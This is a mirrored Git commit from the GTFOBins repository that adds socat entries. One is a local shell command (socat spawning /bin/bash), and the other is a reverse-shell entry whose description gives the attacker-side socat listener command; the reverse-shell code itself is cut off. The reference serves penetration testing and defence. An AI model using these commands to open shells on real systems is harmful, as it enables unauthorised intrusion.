1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-01-23 08:31:34 +01:00

Add socat shell

This commit is contained in:
JayDee Raymaker 2020-05-13 19:33:13 +02:00 committed by GitHub
parent ed2fa545ca
commit 0d98790312
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23

@ -1,5 +1,8 @@
---
functions:
shell:
- code: |
socat STDIN EXEC:/bin/bash
reverse-shell:
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
code: |